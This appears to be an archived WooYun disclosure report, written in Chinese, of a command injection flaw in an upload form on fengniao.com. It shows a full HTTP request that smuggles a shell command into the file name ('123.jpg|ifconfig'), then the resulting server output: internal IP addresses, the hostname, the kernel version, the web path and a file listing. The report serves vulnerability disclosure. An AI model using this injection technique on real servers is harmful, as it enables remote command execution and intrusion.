乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-11: 细节已通知厂商并且等待厂商处理中 2015-11-11: 厂商已经确认,细节仅向厂商公开 2015-11-21: 细节向核心白帽子及相关领域专家公开 2015-12-01: 细节向普通白帽子公开 2015-12-11: 细节向实习白帽子公开 2015-12-26: 细节向公众公开
POST /topic/seagate/upload.php HTTP/1.1Host: www.fengniao.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.fengniao.com/topic/seagate/upload.phpCookie: __utma=1727398.213344896.1446190154.1446190154.1446190154.1; __utmb=1727398.5.10.1446190154; __utmc=1727398; __utmz=1727398.1446190154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; mltn=@4~6171412388184999580>1>1446190123461>1>1446190123461>6171412388184999579>1446190123461@; mlti=@4~144619015498015232@; mlts=@4~5@; ip_ck=5cWA5fj2j7QuMjIxMjIxLjE0NDYxOTAxMjQ%3D; lv=1446190160; vn=1; z_pro_city=s_provice%3Dbeijingshi%26s_city%3D; Hm_lvt_916ddc034db3aa7261c5d56a3001e7c5=1446190399; Hm_lpvt_916ddc034db3aa7261c5d56a3001e7c5=1446190406; bdshare_firstime=1446190400217Connection: keep-aliveContent-Type: multipart/form-data; boundary=---------------------------157521457315459Content-Length: 4699-----------------------------157521457315459Content-Disposition: form-data; name="tijiao"1-----------------------------157521457315459Content-Disposition: form-data; name="username"11111-----------------------------157521457315459Content-Disposition: form-data; name="realname"111-----------------------------157521457315459Content-Disposition: form-data; name="age"11-----------------------------157521457315459Content-Disposition: form-data; name="city"1111111-----------------------------157521457315459Content-Disposition: form-data; name="mobile"1111111-----------------------------157521457315459Content-Disposition: form-data; name="email"[email protected]-----------------------------157521457315459Content-Disposition: form-data; name="title"1111111-----------------------------157521457315459Content-Disposition: form-data; name="filename"; filename="123.jpg|ifconfig"Content-Type: image/jpegÿØÿà
问题出题上传文件名处filename ;Content-Disposition: form-data; name="filename"; filename="123.jpg|ifconfig" 利用隧道通配符可执行系统任意命令
eth0 Link encap:Ethernet HWaddr 00:50:56:B4:AD:E2 inet addr:10.15.184.191 Bcast:10.15.191.255 Mask:255.255.248.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:3346812881 errors:0 dropped:0 overruns:0 frame:0 TX packets:2278368580 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:1366729260678 (1.2 TiB) TX bytes:607313144058 (565.6 GiB)eth1 Link encap:Ethernet HWaddr 00:50:56:B4:E5:D9 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:103585252 errors:0 dropped:0 overruns:0 frame:0 TX packets:12 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:6274065644 (5.8 GiB) TX bytes:4104 (4.0 KiB)eth2 Link encap:Ethernet HWaddr 00:50:56:B4:04:DB UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:103570105 errors:0 dropped:0 overruns:0 frame:0 TX packets:11 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:6273140102 (5.8 GiB) TX bytes:3762 (3.6 KiB)eth3 Link encap:Ethernet HWaddr 00:50:56:B4:33:48 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:103553778 errors:0 dropped:0 overruns:0 frame:0 TX packets:11 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:6272150125 (5.8 GiB) TX bytes:3762 (3.6 KiB)lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:141456524 errors:0 dropped:0 overruns:0 frame:0 TX packets:141456524 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:34148334880 (31.8 GiB) TX bytes:34148334880 (31.8 GiB)lo:0 Link encap:Local Loopback inet addr:10.15.187.253 Mask:255.255.255.255 UP LOOPBACK RUNNING MTU:16436 Metric:1
Linux c25-fn-bbs-web3.cnet.com.cn 2.6.18-308.4.1.el5.centos.plus #1 SMP Tue Apr 17 21:00:16 EDT 2012 x86_64 x86_64 x86_64 GNU/Linux
当前目录:/export/home/cms/www.fengniao.com/www/topic/seagate
apache
1.html1.php22.phpadmin_ranks.phpadmin_ranks1.phpc_data.phpcomment.phpcounts.phpcssdelete.phpdocdongtai.phpentries.phperror.phpfunction1.phphuojiang.phpiframe.phpiframe1.phpimagesincludeindex.phpindex1.phpindex_1.phpindex_2.phpindex_old.phpjslist.phpnext.phpphoto_list.phppic.phppost.phpproductt.htmltest.htmlupload.phpupload_c.phpuser_pic.phpuser_pic1.phpuser_pic2.phpvote.phpxin.jpgzhiye.php
危害等级:中
漏洞Rank:10
确认时间:2015-11-11 14:31
非常感谢
暂无